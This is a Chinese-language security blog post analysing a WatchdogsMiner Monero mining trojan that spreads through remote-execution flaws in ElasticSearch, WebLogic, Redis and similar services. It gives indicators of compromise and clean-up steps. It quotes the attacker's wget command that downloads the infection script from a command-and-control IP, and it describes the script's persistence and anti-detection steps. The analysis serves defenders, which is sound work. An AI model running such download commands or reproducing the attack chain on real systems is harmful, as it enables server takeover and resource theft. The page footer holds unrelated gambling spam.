freeBuf
主站

分類

漏洞 工具 極客 Web安全 系統安全 網絡安全 無線安全 設備/客戶端安全 數據安全 安全管理 企業安全 工控安全

特色

頭條 人物志 活動 視頻 觀點 招聘 報告 資訊 區塊鏈安全 標準與合規 容器安全 公開課

官方公眾號企業安全新浪微博

FreeBuf.COM網絡安全行業門戶,每日發布專業的安全資訊、技術剖析。

FreeBuf+小程序

FreeBuf+小程序

WachtdogsMiner挖礦最新變種分析
2020-10-08 14:25:06

一、背景

2020年9月23日,捕獲到一起挖礦木馬行為,通過分析,定性為針對“門羅幣”的WatchdogsMiner變種挖礦木馬入侵事件,一個求生欲望很強的Linux挖礦病毒家族,其采用了多種方式隱藏以及持久化攻擊,該樣本會訪問。

攻擊者利用ElasticSearch命令執行漏洞,在未授權的情況下遠程執行代碼,執行java程序執行wget命令下載shell腳本,該挖礦腳本組件,里更新了查殺更多家族的挖礦木馬的腳本,如果運用得當,可改寫為多版本挖礦木馬的查殺工具。本文對WatchdogsMiner挖礦木馬核心代碼進行分析,便于從事安全事件響應的同行碰到相同類型的挖礦木馬可以快速排查,定性安全威脅事件。

相較于過去發現的挖礦病毒,這次的挖礦病毒隱藏性更高,也更難被清理。服務器被該病毒入侵后將嚴重影響業務正常運行甚至導致奔潰,給企業帶來不必要的損失。

攻擊日志:

攻擊者試圖在被攻擊服務器上執行如下命令:

wget http://185.181.10.234/E5DB0E07C3D7BE80V520/init.sh -P /tmp/sssooo

二、入侵分析

經過對捕獲的事件進行分析,我們發現整個入侵流程大概是包含以下幾個環節:

1、掃描開放9200、8080、8088、6380、6379、7001、7002、1433端口的Linux服務器(后續掃描9126個ip)

2、通過ElasticSearch(9200)、weblogic(7001/7002)、redis(6379/6380)、MSSQL(1433)?、hadoop(8088)、apache(8080)命令執行漏洞init.sh修改為/tmp/sssooo,然后執行母體腳本,將下載執行母體腳本的動作寫入crontab任務

3、通過腳本實現以上的相關行為,完成植入并啟動挖礦程序

4、然后以守護進程的方式進行挖礦,挖礦的幣種為門羅幣。

微步分析網絡行為:

三 樣本介紹

樣本基本信息:

樣本

MD5

內容

update.sh

4cc8f97c2bf9cbabb2c2be292886212a

挖礦母體腳本

sysupdate

149c79bf71a54ec41f6793819682f790

64位挖礦程序

config.json

c8325863c6ba60d62729decdde95c6fb

挖礦配置文件

networkservice

8e9957b496a745f5db09b0f963eba74e

漏洞利用木馬

sysguard

c31038f977f766eeba8415f3ba2c242c

64位挖礦程序

、樣本分析

攻擊者利用ElasticSearch命令執行漏洞下載init.sh挖礦母體腳本,相較于老版本的WatchdogsMiner樣本,通過函數功能去實現排他功能,建立自己的根據地進程牟利,代碼可讀性更強了。腳本內容如下:

(1)首先關閉SElinux防火墻,更改系統默認命令,指定挖礦木馬鏈接和文件大小,防止文件被改動;

(2)結束其他挖礦進程函數;

(3)下載挖礦木馬函數;

(4)清理非sysguard|update.sh|sysupdate|networkservice進程函數;

(5)在crontab添加母體腳本下載和執行定時任務,添加攻擊者主機的ssh密鑰,下載挖礦配置文件和挖礦程序;

(6)配置防火墻,查殺Stratum礦池協議的挖礦進程,使得自己獨占CPU資源,刪除行為日志。

4.1 XMR挖礦信息如下

礦池地址:xmr.f2pool.com:13531

用戶名:43zqYTWj1JG1H1idZFQWwJZLTos3hbJ5iR3tJpEtwEi43UBbzPeaQxCRysdjYTtdc8aHao7csiWa5BTP9PfNYzyfSbbrwoR.1130

密碼:x

礦池地址:xmr-eu2.nanopool.org:14444

用戶名:

43zqYTWj1JG1H1idZFQWwJZLTos3hbJ5iR3tJpEtwEi43UBbzPeaQxCRysdjYTtdc8aHao7csiWa5BTP9PfNYzyfSbbrwoR.1130

密碼:x

礦池地址:randomxmonero.hk.nicehash.com:3380

用戶名:

3HVQkSGfvyyQ8ACpShBhegoKGLuTCMCiAr.1130

密碼:x

Total paid: 1.000075 XMR

4.2、networkservice分析

逆向分析networkservice樣本發現該樣本UPX加殼了。

脫殼之后分析,發現該樣本嘗試多個存在RCE漏洞的漏洞利用攻擊,已覆蓋更全面的RCE漏洞利用。

分析TCP流量,發現該樣本通過ElasticSearch(9200)、weblogic(7001/7002)、redis(6379/6380)、MSSQL(1433) 、hadoop(8088)、apache(8080)命令執行漏洞下載挖礦腳本,進行牟利。

五、解決方案

1、手動清除挖礦木馬,刪除病毒體rm -rf /tmp/sysupdate,rm /tmp/networkservice, /tmp/sysguard,/tmp/update.sh, /tmp/config.json

2、清理定時任務/usr/bin/crontab

3、查殺挖礦進程,ps auxf|grep -v grep|grep "sysupdate"|awk '{print $2}'|xargs kill -9,ps auxf|grep -v grep|grep " networkservice"|awk '{print $2}'|xargs kill -9,ps auxf|grep -v grep|grep " sysguard"|awk '{print $2}'|xargs kill -9

4、清除開啟自啟動服務chkconfig --del in

5、修復生產環境中RCE的漏洞。

六、相關IOC

MD5

4cc8f97c2bf9cbabb2c2be292886212a

149c79bf71a54ec41f6793819682f790

c8325863c6ba60d62729decdde95c6fb

8e9957b496a745f5db09b0f963eba74e

c31038f977f766eeba8415f3ba2c242c

C2

185.181.10.234

Domain

de.gsearch.com.de

本文作者:, 屬于FreeBuf原創獎勵計劃,未經許可禁止轉載

# 企業安全
被以下專輯收錄,發現更多精彩內容
+ 收入我的專輯
評論 按時間排序

登錄/注冊后在FreeBuf發布內容哦

相關推薦
  • 0 文章數
  • 0 評論數
  • 0 關注者
登錄 / 注冊后在FreeBuf發布內容哦
收入專輯
777766香港开奖结果 小说 第一配资网 配资炒股使用什么方法 综合股票指数 江西快三开奖结果今天 一肖一特期期免费中特 云南快乐十分杀码 投资理财平台有哪些呢 内蒙古快三快三 内蒙古十一选五前三直选 1分快3官网